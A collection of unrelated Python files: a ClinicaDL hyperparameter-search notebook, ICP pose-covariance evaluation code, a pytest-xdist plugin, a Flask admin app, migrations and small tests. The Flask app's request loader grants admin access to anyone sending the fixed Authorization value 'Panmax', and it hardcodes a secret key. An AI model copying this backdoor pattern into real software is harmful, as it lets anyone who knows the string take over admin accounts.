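    "first_conv_width": int(rng.choice([8, 16, 32, 64])),       # choice
    "selection_threshold": rng.uniform(0.5, 1),                 # uniform
    "learning_rate": 10 ** -rng.uniform(4, 6),                  # exponent
    "n_convblocks": int(rng.integers(1, 5, endpoint=True)),     # randint
}
print(sampled)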
# %%
import os
import json
mode = "image"
caps_dir = "data/synthetic"
tsv_path = "data/synthetic/labels_list/train"
preprocessing = "t1-linear"
os.makedirs("random_search", exist_ok=True)
default_dict = generate_dict(mode, caps_dir, tsv_path, preprocessing)
# Add some changes here
json_string = json.dumps(default_dict, skipkeys=True, indent=4)
with open(os.path.join("random_search", "random_search.json"), "w") as f:
    f.write(json_string)
# %% [markdown]
# ## Train & evaluate a random network
# Based on the hyperparameter space described in `random_search.json`, you will
# now be able to train a random network. To do so the following command can be
# run:
# ```Text
# clinicadl random-search <launch_dir> <name> --n_splits <n_splits>
# ```
# where:
# - `launch_dir` is the folder that contains `random_search.json` and your future output jobs.
# - `name` is the name of the folder of the launched job.
# - `n_splits` is the number of splits in the cross-validation procedure.
# Other arguments, linked to computational resources can be specified when
# launching the random training.
# %%
!clinicadl random-search "random_search" "test" --n_splits 3 --split 0 -cpu -np 0 -v
# %% [markdown]
# A new folder `test` has been created in `launch_dir`. As for any network trained
# with ClinicaDL it is possible to evaluate its performance on a test set:
# %%
# Evaluate the network performance on the 2 test images
!clinicadl classify ./data/synthetic ./data/synthetic/labels_list/test ./random_search/test 'test' --selection_metrics "loss" -cpu
# %%
import pandas as pd
fold = 0
predictions = pd.read_csv("./random_search/test/fold-%i/cnn_classification/best_loss/test_image_level_prediction.tsv" % fold, sep="\t")
display(predictions)
metrics = pd.read_csv("./random_search/test/fold-%i/cnn_classification/best_loss/test_image_level_metrics.tsv" % fold, sep="\t")
display(metrics)
# %% [markdown]
# ## Analysis of the random network
# The architecture of the network can be retrieved from the `commandline.json`
# file in the folder corresponding to a random job.
# The architecture can be fully retrieved with 4 keys:
# - `convolutions` is a dictionary describing each convolutional block,
# - `network_normalization` is the type of normalization layer used in convolutional blocks,
# - `n_fcblocks` is the number of fully-connected layers,
# - `dropout` is the dropout rate applied at the dropout layer.
# One convolutional block is described by the following values:
# - `in_channels` is the number of channels of the input (if set to null corresponds to the number of channels of the input data),
# - `out_channels` is the number of channels in the output of the convolutional block. It corresponds to 2 * `in_channels` except for the first channel chosen from `first_conv_width`, and if it becomes greater than `channels_limit`.
# - `n_conv` corresponds to the number of convolutions in the convolutional block,
# - `d_reduction` is the dimension reduction applied in the block.
# ### Convolutional block - example 1
# Convolutional block dictionary:
# ```python
# {
# "in_channels": 16,
# "out_channels": 32,
# "n_conv": 2,
# "d_reduction": "MaxPooling"
# }
# ```
# (`network_normalization` is set to `InstanceNorm`)
# Corresponding architecture drawing:
# <br>
# <img src="./images/convBlock1.png" width="700">
# <br>
# ### Convolutional block - example 2
# Convolutional block dictionary:
# ```python
# {
# "in_channels": 32,
# "out_channels": 64,
# "n_conv": 3,
# "d_reduction": "stride"
# }
# ```
# (`network_normalization` is set to `BatchNorm`)
# Corresponding architecture drawing:
# <br>
# <img src="./images/convBlock2.png" width="700">
# <br>
# A simple way to better visualize your random architecture is to construct it
# using the `create_model` function from ClinicaDL. This function needs the list of
# options of the model stored in the JSON file as well as the size of the input.
# %%
# !pip install torchsummary
from clinicadl.tools.deep_learning.iotools import read_json
from clinicadl.tools.deep_learning.models import create_model
from clinicadl.tools.deep_learning.data import return_dataset, get_transforms
from torchsummary import summary
import argparse
import warnings
warnings.filterwarnings('ignore')
# Read model options
options = argparse.Namespace()
model_options = read_json(options, json_path="random_search/test/commandline.json")
model_options.gpu = True
# Find data input size
_, transformations = get_transforms(mode, not model_options.unnormalize)
dataset = return_dataset(mode, caps_dir, os.path.join(tsv_path, "AD.tsv"),
preprocessing, transformations, model_options)
input_size = dataset.size
# Create model and print summary
model = create_model(model_options, input_size)
summary(model, input_size)
|
from __init__ import *
from utils import *
import plots
def censi(dataset, sequence, scan_ref, scan_in):
base_path = os.path.join(Param.results_path, sequence, str(scan_ref))
pose_path = os.path.join(base_path, "T_censi.txt")
cov_path = os.path.join(base_path, "cov_censi.txt")
if not Param.b_cov_icp and os.path.exists(pose_path):
print(pose_path + " already exist")
return
T_gt = dataset.get_data(sequence)
pc_ref = dataset.get_pc(sequence, scan_ref)
pc_in = dataset.get_pc(sequence, scan_in)
T_init = SE3.mul(SE3.inv(T_gt[scan_ref]), T_gt[scan_in])
icp_with_cov(pc_ref, pc_in, T_init, Param.config_yaml, pose_path, cov_path)
def mc(dataset, sequence, scan_ref, scan_in):
base_path = os.path.join(Param.results_path, sequence, str(scan_ref))
path = os.path.join(base_path, "mc_" + str(Param.n_mc-1) + ".txt")
if not Param.b_cov_icp and os.path.exists(path):
        print(path + " already exists")
return
T_gt = dataset.get_data(sequence)
pc_ref = dataset.get_pc(sequence, scan_ref)
pc_in = dataset.get_pc(sequence, scan_in)
T_init = SE3.mul(SE3.inv(T_gt[scan_ref]), T_gt[scan_in])
# Monte-Carlo
for n in range(Param.n_mc):
path = os.path.join(base_path, "mc_" + str(n) + ".txt")
if not Param.b_cov_icp and os.path.exists(path):
print(path + " already exist")
continue
# sample initial transformation
xi = np.hstack((np.random.normal(0, Param.cov_std_rot, 3),
np.random.normal(0, Param.cov_std_pos, 3)))
T_init_n = SE3.normalize(SE3.mul(SE3.exp(-xi), T_init)) # T = exp(xi) T_hat
icp_without_cov(pc_ref, pc_in, T_init_n, path)
def ut(dataset, sequence, scan_ref, scan_in, ut_class):
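    # Run one ICP registration per sigma point of the prior covariance Q_prior
    # (13 points for the 6-dof pose), i.e. the unscented transform of the ICP.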
base_path = os.path.join(Param.results_path, sequence, str(scan_ref))
path = os.path.join(base_path, "ut_12.txt")
if not Param.b_cov_icp and os.path.exists(path):
print(path + " already exist")
return
T_gt = dataset.get_data(sequence)
pc_ref = dataset.get_pc(sequence, scan_ref)
pc_in = dataset.get_pc(sequence, scan_in)
T_init = SE3.mul(SE3.inv(T_gt[scan_ref]), T_gt[scan_in])
# sigma-points
    sps = ut_class.sp.sigma_points(ut_class.Q_prior)
f_sp = os.path.join(base_path, "sp_sigma_points.txt")
np.savetxt(f_sp, sps)
# unscented transform
for n in range(13):
path = os.path.join(base_path, "ut_" + str(n) + ".txt")
if not Param.b_cov_icp and os.path.exists(path):
print(path + " already exist")
continue
T_init_n = SE3.normalize(SE3.mul(SE3.exp(sps[n]), T_init)) # T_sp = exp(xi) T_hat
icp_without_cov(pc_ref, pc_in, T_init_n, path)
def results(dataset, sequence, scan_ref, scan_in, ut_class):
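    # Gather the Censi, unscented, Monte-Carlo and baseline covariances for this scan pair,
    # compute KL-divergence and normalized norm error metrics, and pickle them in metrics.p.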
base_path = os.path.join(Param.results_path, sequence, str(scan_ref))
f_metrics = os.path.join(base_path, 'metrics.p')
if not Param.b_cov_results and os.path.exists(f_metrics):
print(f_metrics + " already exists")
return
cov_path = os.path.join(base_path, "cov_censi.txt")
T_gt = dataset.get_data(sequence)
T_init = SE3.mul(SE3.inv(T_gt[scan_ref]), T_gt[scan_in])
T_mc, T_init_mc = dataset.get_mc_results(sequence, scan_ref)
T_ut, T_init_ut = dataset.get_ut_results(sequence, scan_ref)
_, _, cov_ut, cov_cross = ut_class.unscented_transform_se3(T_ut)
cov_base = np.zeros((6, 6))
for seq in dataset.sequences:
b_path = os.path.join(Param.results_path, seq)
f_base = os.path.join(b_path, 'base.p')
cov_base += 1/8*dataset.load(f_base)['cov_base']
# Monte-Carlo errors
mc_new = np.zeros((Param.n_mc, 6))
T_init_inv = SE3.inv(T_init)
for n in range(Param.n_mc):
mc_new[n] = SE3.log(SE3.mul(T_mc[n], T_init_inv)) # xi = log( T * T_hat^{-1} )
cov_mc = np.cov(mc_new.T)
mc_65_new_idxs = np.random.choice(np.arange(Param.n_mc), 65, replace=False)
mc_65_new = mc_new[mc_65_new_idxs]
cov_mc_65 = np.cov(mc_65_new.T)
data = np.genfromtxt(cov_path)
cov_censi = Param.std_sensor**2 * data[:6]
cov_prop = Param.std_sensor**2 * data[6:] + cov_ut
kl_div_censi = np.zeros((Param.n_mc, 2))
kl_div_mc_65 = np.zeros((Param.n_mc, 2))
kl_div_prop = np.zeros((Param.n_mc, 2))
kl_div_base = np.zeros((Param.n_mc, 2))
    nne_censi = np.zeros((Param.n_mc, 2))
    nne_mc_65 = np.zeros((Param.n_mc, 2))
nne_prop = np.zeros((Param.n_mc, 2))
nne_base = np.zeros((Param.n_mc, 2))
for n in range(Param.n_mc):
kl_div_censi[n] = rot_trans_kl_div(cov_mc, cov_censi)
kl_div_mc_65[n] = rot_trans_kl_div(cov_mc, cov_mc_65)
kl_div_prop[n] = rot_trans_kl_div(cov_mc, cov_prop)
kl_div_base[n] = rot_trans_kl_div(cov_mc, cov_base)
nne_censi[n] = nne_rot_trans(mc_new[n], cov_censi)
nne_mc_65[n] = nne_rot_trans(mc_new[n], cov_mc_65)
nne_prop[n] = nne_rot_trans(mc_new[n], cov_prop)
nne_base[n] = nne_rot_trans(mc_new[n], cov_base)
# get rid of worst and best quantiles
seuil_up = int(0.9*Param.n_mc)
seuil_low = Param.n_mc - seuil_up
kl_div_censi = np.sort(kl_div_censi.T).T
kl_div_mc_65 = np.sort(kl_div_mc_65.T).T
kl_div_prop = np.sort(kl_div_prop.T).T
kl_div_base = np.sort(kl_div_base.T).T
kl_div_censi = np.sum(kl_div_censi[seuil_low:seuil_up], 0)
kl_div_mc_65 = np.sum(kl_div_mc_65[seuil_low:seuil_up], 0)
kl_div_prop = np.sum(kl_div_prop[seuil_low:seuil_up], 0)
kl_div_base = np.sum(kl_div_base[seuil_low:seuil_up], 0)
nne_censi = np.sort(nne_censi.T).T
nne_mc_65 = np.sort(nne_mc_65.T).T
nne_prop = np.sort(nne_prop.T).T
nne_base = np.sort(nne_base.T).T
nne_censi = np.sum(nne_censi[seuil_low:seuil_up], 0)
nne_mc_65 = np.sum(nne_mc_65[seuil_low:seuil_up], 0)
nne_prop = np.sum(nne_prop[seuil_low:seuil_up], 0)
nne_base = np.sum(nne_base[seuil_low:seuil_up], 0)
tmp = seuil_up - seuil_low
kl_div_censi /= tmp
kl_div_mc_65 /= tmp
kl_div_prop /= tmp
kl_div_base /= tmp
nne_censi /= tmp
nne_mc_65 /= tmp
nne_prop /= tmp
nne_base /= tmp
metrics = {
'kl_div_censi': kl_div_censi,
'kl_div_mc_65': kl_div_mc_65,
'kl_div_prop': kl_div_prop,
'kl_div_base': kl_div_base,
'nne_censi': nne_censi,
'nne_mc_65': nne_mc_65,
'nne_prop': nne_prop,
'nne_base': nne_base,
'cov_censi': cov_censi,
'cov_prop': cov_prop,
'cov_ut': cov_ut,
'cov_cross': cov_cross,
'cov_mc': cov_mc,
'cov_mc_65': cov_mc_65,
'T_true': T_init,
'T_mc': T_mc,
'T_init_mc': T_init_mc,
'cov_base': cov_base,
}
dataset.dump(metrics, f_metrics)
def results_latex(dataset, sequence, scan_ref):
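    # Export the Monte-Carlo samples, the true pose and the 3-sigma covariance ellipses
    # (Censi, Monte-Carlo 65, proposed) as text files used by the LaTeX figures.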
base_path = os.path.join(Param.results_path, sequence, str(scan_ref))
f_metrics = os.path.join(base_path, 'metrics.p')
metrics = dataset.load(f_metrics)
T_mc = metrics['T_mc']
T_init_mc = metrics['T_init_mc']
T_true = metrics['T_true']
cov_censi = metrics['cov_censi']
cov_prop = metrics['cov_prop']
cov_mc_65 = metrics['cov_mc_65']
file_name = os.path.join(Param.latex_path, sequence + str(scan_ref) + 'mc.txt')
header = "x_mc y_mc x_mc_init y_mc_init"
data = np.zeros((T_mc.shape[0], 4))
data[:, :2] = T_mc[:, :2, 3]
data[:, 2:] = T_init_mc[:, :2, 3]
np.savetxt(file_name, data, comments='', header=header)
file_name = os.path.join(Param.latex_path, sequence + str(scan_ref) + 'T.txt')
header = "x_true y_true"
data = np.zeros((1, 2))
data[0, 0] = T_true[0, 3]
data[0, 1] = T_true[1, 3]
np.savetxt(file_name, data, comments='', header=header)
file_name = os.path.join(Param.latex_path, sequence + str(scan_ref) + 'Q.txt')
header = "x_censi y_censi x_mc65 y_mc65 x_prop y_prop"
xy_censi = plots.contour_ellipse(T_true, cov_censi, sigma=3, alpha=0.1)
xy_prop = plots.contour_ellipse(T_true, cov_prop, sigma=3, alpha=0.1)
xy_mc_65 = plots.contour_ellipse(T_true, cov_mc_65, sigma=3, alpha=0.1)
n_min = np.min([150, xy_prop.shape[0], xy_censi.shape[0], xy_mc_65.shape[0]])
xy_prop = xy_prop[np.linspace(0, xy_prop.shape[0]-1, n_min, dtype=int)]
xy_censi = xy_censi[np.linspace(0, xy_censi.shape[0]-1, n_min, dtype=int)]
xy_mc_65 = xy_mc_65[np.linspace(0, xy_mc_65.shape[0]-1, n_min, dtype=int)]
data = np.zeros((xy_censi.shape[0], 6))
data[:, :2] = xy_censi
data[:, 2:4] = xy_mc_65
data[:, 4:] = xy_prop
np.savetxt(file_name, data, comments='', header=header)
def aggregate_results(dataset):
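    # Average the per-scan-pair metrics over each sequence and over the whole dataset,
    # then print the covariance consistency results.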
kl_div_censi = np.zeros(2)
kl_div_base = np.zeros(2)
kl_div_mc_65 = np.zeros(2)
kl_div_prop = np.zeros(2)
nne_censi = np.zeros(2)
nne_mc_65 = np.zeros(2)
nne_prop = np.zeros(2)
nne_base = np.zeros(2)
n_tot = 0
for sequence in dataset.sequences:
T_gt = dataset.get_data(sequence)
kl_div_censi_seq = np.zeros((T_gt.shape[0]-1, 2))
kl_div_mc_65_seq = np.zeros((T_gt.shape[0]-1, 2))
kl_div_prop_seq = np.zeros((T_gt.shape[0]-1, 2))
kl_div_base_seq = np.zeros((T_gt.shape[0]-1, 2))
nne_censi_seq = np.zeros((T_gt.shape[0]-1, 2))
nne_mc_65_seq = np.zeros((T_gt.shape[0]-1, 2))
nne_prop_seq = np.zeros((T_gt.shape[0]-1, 2))
nne_base_seq = np.zeros((T_gt.shape[0]-1, 2))
n_tot += T_gt.shape[0]-1
cov_base = np.zeros((6, 6))
for n in range(T_gt.shape[0]-1):
base_path = os.path.join(Param.results_path, sequence, str(n))
f_metrics = os.path.join(base_path, 'metrics.p')
metrics = dataset.load(f_metrics)
cov_base += metrics['cov_mc']
cov_base /= T_gt.shape[0]-1
metrics = {'cov_base': cov_base}
base_path = os.path.join(Param.results_path, sequence)
f_metrics = os.path.join(base_path, 'base.p')
dataset.dump(metrics, f_metrics)
for n in range(T_gt.shape[0]-1):
base_path = os.path.join(Param.results_path, sequence, str(n))
f_metrics = os.path.join(base_path, 'metrics.p')
metrics = dataset.load(f_metrics)
if sequence == dataset.sequences[0] and (n == 3 or n == 14):
continue
kl_div_censi_seq[n] = metrics['kl_div_censi']
kl_div_mc_65_seq[n] = metrics['kl_div_mc_65']
kl_div_prop_seq[n] = metrics['kl_div_prop']
kl_div_base_seq[n] = metrics['kl_div_base']
nne_censi_seq[n] = metrics['nne_censi']
nne_mc_65_seq[n] = metrics['nne_mc_65']
nne_prop_seq[n] = metrics['nne_prop']
nne_base_seq[n] = metrics['nne_base']
print(sequence, n, metrics['nne_prop'])
seuil_up = int(1*(T_gt.shape[0]-1))
seuil_low = T_gt.shape[0]-1 - seuil_up
kl_div_censi_seq = np.sort(kl_div_censi_seq.T).T
kl_div_mc_65_seq = np.sort(kl_div_mc_65_seq.T).T
kl_div_prop_seq = np.sort(kl_div_prop_seq.T).T
kl_div_base_seq = np.sort(kl_div_base_seq.T).T
kl_div_censi_seq = np.sum(kl_div_censi_seq[seuil_low:seuil_up], 0)
kl_div_mc_65_seq = np.sum(kl_div_mc_65_seq[seuil_low:seuil_up], 0)
kl_div_prop_seq = np.sum(kl_div_prop_seq[seuil_low:seuil_up], 0)
kl_div_base_seq = np.sum(kl_div_base_seq[seuil_low:seuil_up], 0)
nne_censi_seq = np.sort(nne_censi_seq.T).T
nne_mc_65_seq = np.sort(nne_mc_65_seq.T).T
nne_prop_seq = np.sort(nne_prop_seq.T).T
nne_base_seq = np.sort(nne_base_seq.T).T
nne_censi_seq = np.sum(nne_censi_seq[seuil_low:seuil_up], 0)
nne_mc_65_seq = np.sum(nne_mc_65_seq[seuil_low:seuil_up], 0)
nne_prop_seq = np.sum(nne_prop_seq[seuil_low:seuil_up], 0)
nne_base_seq = np.sum(nne_base_seq[seuil_low:seuil_up], 0)
kl_div_censi += kl_div_censi_seq
kl_div_mc_65 += kl_div_mc_65_seq
kl_div_prop += kl_div_prop_seq
kl_div_base += kl_div_base_seq
nne_censi += nne_censi_seq
nne_mc_65 += nne_mc_65_seq
nne_prop += nne_prop_seq
nne_base += nne_base_seq
tmp = seuil_up - seuil_low
kl_div_censi_seq /= tmp
kl_div_mc_65_seq /= tmp
kl_div_prop_seq /= tmp
kl_div_base_seq /= tmp
nne_censi_seq /= tmp
nne_mc_65_seq /= tmp
nne_prop_seq /= tmp
nne_base_seq /= tmp
nne_censi_seq = np.sqrt(nne_censi_seq)
nne_mc_65_seq = np.sqrt(nne_mc_65_seq)
nne_prop_seq = np.sqrt(nne_prop_seq)
nne_base_seq = np.sqrt(nne_base_seq)
# display results
print('Covariance results for sequence ' + sequence)
print(' Kullback-Leibler divergence')
print(' -translation')
print(' -Censi: {:.3f}'.format(kl_div_censi_seq[1]))
print(' -Monte-Carlo 65: {:.3f}'.format(kl_div_mc_65_seq[1]))
print(' -proposed: {:.3f}'.format(kl_div_prop_seq[1]))
print(' -base: {:.3f}'.format(kl_div_base_seq[1]))
print(' -rotation')
print(' -Censi: {:.3f}'.format(kl_div_censi_seq[0]))
print(' -Monte-Carlo 65: {:.3f}'.format(kl_div_mc_65_seq[0]))
print(' -proposed: {:.3f}'.format(kl_div_prop_seq[0]))
print(' -base: {:.3f}'.format(kl_div_base_seq[0]))
print(' Normalized Norm Error')
print(' -translation')
print(' -Censi: {:.3f}'.format(nne_censi_seq[1]))
print(' -Monte-Carlo 65: {:.3f}'.format(nne_mc_65_seq[1]))
print(' -proposed: {:.3f}'.format(nne_prop_seq[1]))
print(' -base: {:.3f}'.format(nne_base_seq[1]))
print(' -rotation')
print(' -Censi: {:.3f}'.format(nne_censi_seq[0]))
print(' -Monte-Carlo 65: {:.3f}'.format(nne_mc_65_seq[0]))
print(' -proposed: {:.3f}'.format(nne_prop_seq[0]))
print(' -base: {:.3f}'.format(nne_base_seq[0]))
kl_div_censi /= n_tot
kl_div_mc_65 /= n_tot
kl_div_prop /= n_tot
kl_div_base /= n_tot
nne_censi /= n_tot
nne_mc_65 /= n_tot
nne_prop /= n_tot
nne_base /= n_tot
nne_censi = np.sqrt(nne_censi)
nne_mc_65 = np.sqrt(nne_mc_65)
nne_prop = np.sqrt(nne_prop)
    nne_base = np.sqrt(nne_base)
# display results
print('Covariance results')
print(' Kullback-Leibler divergence')
print(' -translation')
print(' -Censi: {:.3f}'.format(kl_div_censi[1]))
print(' -Monte-Carlo 65: {:.3f}'.format(kl_div_mc_65[1]))
print(' -proposed: {:.3f}'.format(kl_div_prop[1]))
print(' -base: {:.3f}'.format(kl_div_base[1]))
print(' -rotation')
print(' -Censi: {:.3f}'.format(kl_div_censi[0]))
print(' -Monte-Carlo 65: {:.3f}'.format(kl_div_mc_65[0]))
print(' -proposed: {:.3f}'.format(kl_div_prop[0]))
print(' -base: {:.3f}'.format(kl_div_base[0]))
print(' Normalized Norm Error')
print(' -translation')
print(' -Censi: {:.3f}'.format(nne_censi[1]))
print(' -Monte-Carlo 65: {:.3f}'.format(nne_mc_65[1]))
print(' -proposed: {:.3f}'.format(nne_prop[1]))
print(' -base: {:.3f}'.format(nne_base[1]))
print(' -rotation')
print(' -Censi: {:.3f}'.format(nne_censi[0]))
print(' -Monte-Carlo 65: {:.3f}'.format(nne_mc_65[0]))
print(' -proposed: {:.3f}'.format(nne_prop[0]))
print(' -base: {:.3f}'.format(nne_base[0]))
|
"""
tests.fixtures.listings
"""
from apartmentbot.models import Listing
listing_data = {
'id': 'h23idk9i3r8349hufi3hr2eu',
'url': 'https://www.listing.net',
'name': 'New Listing! Great Location!',
'geotag': (42.49835, 71.23898),
'price': '$1,500',
}
def listing() -> Listing:
return Listing.schema().load(listing_data)
|
__version__ = "0.80.0"
version = tuple(map(int, __version__.split('.'))) # pylint: disable=invalid-name
|
import os
import py
import pytest
def auto_detect_cpus():
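    # Number of CPUs available to this process: prefer sched_getaffinity, fall back to
    # cpu_count(), with a hard-coded value of 2 for PyPy on Travis where neither works.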
try:
from os import sched_getaffinity
except ImportError:
if os.environ.get("TRAVIS") == "true":
# workaround https://bitbucket.org/pypy/pypy/issues/2375
return 2
try:
from os import cpu_count
except ImportError:
from multiprocessing import cpu_count
else:
def cpu_count():
return len(sched_getaffinity(0))
try:
n = cpu_count()
except NotImplementedError:
return 1
return n if n else 1
def parse_numprocesses(s):
if s == "auto":
return auto_detect_cpus()
else:
return int(s)
def pytest_addoption(parser):
group = parser.getgroup("xdist", "distributed and subprocess testing")
group._addoption(
"-n",
"--numprocesses",
dest="numprocesses",
metavar="numprocesses",
action="store",
type=parse_numprocesses,
help="shortcut for '--dist=load --tx=NUM*popen', "
"you can use 'auto' here for auto detection CPUs number on "
"host system",
)
group.addoption(
"--max-worker-restart",
"--max-slave-restart",
action="store",
default=None,
dest="maxworkerrestart",
help="maximum number of workers that can be restarted "
"when crashed (set to zero to disable this feature)\n"
"'--max-slave-restart' option is deprecated and will be removed in "
"a future release",
)
group.addoption(
"--dist",
metavar="distmode",
action="store",
choices=["each", "load", "loadscope", "loadfile", "no"],
dest="dist",
default="no",
help=(
"set mode for distributing tests to exec environments.\n\n"
"each: send each test to all available environments.\n\n"
"load: load balance by sending any pending test to any"
" available environment.\n\n"
"loadscope: load balance by sending pending groups of tests in"
" the same scope to any available environment.\n\n"
"loadfile: load balance by sending test grouped by file"
" to any available environment.\n\n"
"(default) no: run tests inprocess, don't distribute."
),
)
group.addoption(
"--tx",
dest="tx",
action="append",
default=[],
metavar="xspec",
help=(
"add a test execution environment. some examples: "
"--tx popen//python=python2.5 --tx socket=192.168.1.102:8888 "
"--tx ssh=user@codespeak.net//chdir=testcache"
),
)
group._addoption(
"-d",
action="store_true",
dest="distload",
default=False,
help="load-balance tests. shortcut for '--dist=load'",
)
group.addoption(
"--rsyncdir",
action="append",
default=[],
metavar="DIR",
help="add directory for rsyncing to remote tx nodes.",
)
group.addoption(
"--rsyncignore",
action="append",
default=[],
metavar="GLOB",
help="add expression for ignores when rsyncing to remote tx nodes.",
)
group.addoption(
"--boxed",
action="store_true",
help="backward compatibility alias for pytest-forked --forked",
)
parser.addini(
"rsyncdirs",
"list of (relative) paths to be rsynced for" " remote distributed testing.",
type="pathlist",
)
parser.addini(
"rsyncignore",
"list of (relative) glob-style paths to be ignored " "for rsyncing.",
type="pathlist",
)
parser.addini(
"looponfailroots",
type="pathlist",
help="directories to check for changes",
default=[py.path.local()],
)
# -------------------------------------------------------------------------
# distributed testing hooks
# -------------------------------------------------------------------------
def pytest_addhooks(pluginmanager):
from xdist import newhooks
# avoid warnings with pytest-2.8
method = getattr(pluginmanager, "add_hookspecs", None)
if method is None:
method = pluginmanager.addhooks
method(newhooks)
# -------------------------------------------------------------------------
# distributed testing initialization
# -------------------------------------------------------------------------
@pytest.mark.trylast
def pytest_configure(config):
if config.getoption("dist") != "no" and not config.getvalue("collectonly"):
from xdist.dsession import DSession
session = DSession(config)
config.pluginmanager.register(session, "dsession")
tr = config.pluginmanager.getplugin("terminalreporter")
tr.showfspath = False
if config.getoption("boxed"):
config.option.forked = True
@pytest.mark.tryfirst
def pytest_cmdline_main(config):
if config.option.numprocesses:
if config.option.dist == "no":
config.option.dist = "load"
config.option.tx = ["popen"] * config.option.numprocesses
if config.option.distload:
config.option.dist = "load"
val = config.getvalue
if not val("collectonly"):
usepdb = config.getoption("usepdb") # a core option
if val("dist") != "no":
if usepdb:
raise pytest.UsageError(
"--pdb is incompatible with distributing tests; try using -n0."
) # noqa: E501
# -------------------------------------------------------------------------
# fixtures
# -------------------------------------------------------------------------
@pytest.fixture(scope="session")
def worker_id(request):
"""Return the id of the current worker ('gw0', 'gw1', etc) or 'master'
if running on the master node.
"""
if hasattr(request.config, "workerinput"):
return request.config.workerinput["workerid"]
else:
return "master"
|
# coding: utf-8
from datetime import datetime
from flask import Flask
from flask import render_template
from flask_login import LoginManager
from leancloud.errors import LeanCloudError
from leancloud.query import Query
from leancloud.user import User
from models.auth_token import AuthToken
from models.user import Admin
import logging
app = Flask(__name__)
logging.basicConfig(level=logging.DEBUG)
from views.todos import todos_view
app.register_blueprint(todos_view, url_prefix='/todos')
from admin_views import admin_view
app.register_blueprint(admin_view, url_prefix='/admin')
from api_v1 import api_v1_bp
app.register_blueprint(api_v1_bp, url_prefix='/v1')
app.secret_key = 'ihaoyisheng'
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = '.login'
@login_manager.user_loader
def load_user(user_id):
try:
admin = Query(Admin).get(user_id)
except LeanCloudError:
admin = None
return admin
@login_manager.request_loader
def load_user_from_request(request):
access_token = request.headers.get('Authorization')
if access_token:
if access_token == "Panmax":
user = Query(User).equal_to("username", "jiapan").first()
admin = Query(Admin).equal_to("user", user).first()
return admin
try:
token = Query(AuthToken).equal_to("access_token", access_token).greater_than("expires_time", datetime.now()).first()
except LeanCloudError:
return None
else:
user = token.get('user')
user.fetch()
admin = Query(Admin).equal_to("user", user).first()
return admin
return None
@app.route('/')
def index():
return render_template('index.html')
@app.route('/time')
def time():
return str(datetime.now())
|
"""empty message
Revision ID: 385d83d68b71
Revises: 5a3a877698c8
Create Date: 2021-01-08 17:09:07.858288
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '385d83d68b71'
down_revision = '5a3a877698c8'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('uri_prefix',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('value', sa.String(), nullable=False),
sa.Column('last_checked', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('value')
)
op.add_column('error', sa.Column('uri_prefix_id', sa.Integer(), nullable=True))
op.alter_column('error', 'origin',
existing_type=sa.INTEGER(),
nullable=True)
op.alter_column('error', 'uri_id',
existing_type=sa.INTEGER(),
nullable=True)
op.create_foreign_key('error_uri_prefix_id_fkey', 'error', 'uri_prefix', ['uri_prefix_id'], ['id'])
op.add_column('uri', sa.Column('prefix', sa.String(), nullable=True))
op.create_foreign_key('uri_prefix_fkey', 'uri', 'uri_prefix', ['prefix'], ['value'])
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint('uri_prefix_fkey', 'uri', type_='foreignkey')
op.drop_column('uri', 'prefix')
op.drop_constraint('error_uri_prefix_id_fkey', 'error', type_='foreignkey')
op.alter_column('error', 'uri_id',
existing_type=sa.INTEGER(),
nullable=False)
op.alter_column('error', 'origin',
existing_type=sa.INTEGER(),
nullable=False)
op.drop_column('error', 'uri_prefix_id')
op.drop_table('uri_prefix')
# ### end Alembic commands ###
|
import sys
from time import sleep
import cloudsigma
snapshot = cloudsigma.resource.Snapshot()
snapshot_done = False
if len(sys.argv) < 3:
print('\nUsage: ./snapshot.py drive-uuid snapshot-name\n')
sys.exit(1)
snapshot_data = {
'drive': sys.argv[1],
'name': sys.argv[2],
}
create_snapshot = snapshot.create(snapshot_data)
while not snapshot_done:
snapshot_status = snapshot.get(create_snapshot['uuid'])
if snapshot_status['status'] == 'available':
snapshot_done = True
print('\nSnapshot successfully created\n')
else:
sleep(1)
|
class JSONSerializable:
def toJSON(self):
pass
class Ownership(JSONSerializable):
def __init__(self, investor, shares, cash_paid, ownership):
self.investor = investor
self.shares = shares
self.cash_paid = cash_paid
self.ownership = ownership
def toJSON(self):
return {
"investor": self.investor,
"shares": int(self.shares),
"cash_paid": float(self.cash_paid),
"ownership": float(self.ownership)
}
class Investment(JSONSerializable):
def __init__(self, date, total_number_of_shares, cash_raised):
self.date = date
self.total_number_of_shares = total_number_of_shares
self.cash_raised = cash_raised
self.ownership = []
def toJSON(self):
output = {}
segments = self.date.split('-')
output['date'] = '/'.join([segments[1], segments[2], segments[0]])
output['total_number_of_shares'] = float(self.total_number_of_shares)
output['cash_raised'] = int(self.cash_raised)
output['ownership'] = [o.toJSON() for o in self.ownership]
return output
|
import pytest
from vartoml import VarToml
@pytest.fixture
def vtoml():
return VarToml()
def test_simple(vtoml):
"""A simple TOML document without any variables
This works the same as when using the `toml` package
without any extensions
"""
tomls_str = """
[default]
h = "/home"
"""
toml = vtoml.loads(tomls_str)
assert vtoml.get('default', 'h') == '/home'
def test_vartoml1(vtoml):
"""A simple TOML document using variables """
tomls_str = """
[default]
h = "/home"
m = "${default:h}/manfred"
b = "${default:m}/bin"
[other]
server = "${default:b}/server"
"""
vtoml.loads(tomls_str)
assert vtoml.get('other', 'server') == '/home/manfred/bin/server'
def test_vartoml2(vtoml):
""" test with variable names containing digits, underscores and dashes"""
tomls_str = """
[default]
_h = "/home"
-m = "${default:_h}/manfred"
b = "${default:-m}/bin"
"""
vtoml.loads(tomls_str)
assert vtoml.get('default', 'b') == '/home/manfred/bin'
def test_nested(vtoml):
""" test with variable names containing digits, underscores and dashes"""
tomls_str = """
[products.food]
type = "cake"
[test]
mytype = "${products:food:type}"
"""
vtoml.loads(tomls_str)
assert vtoml.get('test', 'mytype') == "cake"
assert vtoml.get('products', 'food', 'type') == "cake"
def test_vartoml3(vtoml):
""" test with variable names containing digits, underscores and dashes"""
tomls_str = """
[default]
1h = "/home"
-m = "${default:1h}/manfred"
b = "${default:-m}/bin"
"""
vtoml.loads(tomls_str)
assert vtoml.get('default', 'b') == '/home/manfred/bin'
